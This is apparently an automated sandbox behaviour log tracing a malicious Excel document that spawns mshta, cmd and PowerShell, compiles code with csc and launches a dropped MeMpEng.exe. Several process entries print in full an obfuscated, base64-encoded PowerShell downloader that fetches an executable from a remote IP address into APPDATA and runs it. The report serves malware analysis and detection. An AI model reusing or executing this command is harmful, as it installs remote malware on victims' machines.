    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA15F.tmp" "c:\Users\user\AppData\Local\Temp\nxtolslo\CSCFB69AE6B65A0404EAF48BF1216DF885C.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\MeMpEng.exe "C:\Users\user\AppData\Roaming\MeMpEng.exe"
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF3D2.tmp" "c:\Users\user\AppData\Local\Temp\4xnxdpzb\CSC1523D407DAC44B3A2AFF355F7A37C79.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\MeMpEng.exe "C:\Users\user\AppData\Roaming\MeMpEng.exe"
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\MeMpEng.exe "C:\Users\user\AppData\Roaming\MeMpEng.exe" Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA15F.tmp" "c:\Users\user\AppData\Local\Temp\nxtolslo\CSCFB69AE6B65A0404EAF48BF1216DF885C.TMP"Jump to behavior
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.cmdline"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\MeMpEng.exe "C:\Users\user\AppData\Roaming\MeMpEng.exe"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF3D2.tmp" "c:\Users\user\AppData\Local\Temp\4xnxdpzb\CSC1523D407DAC44B3A2AFF355F7A37C79.TMP"Jump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
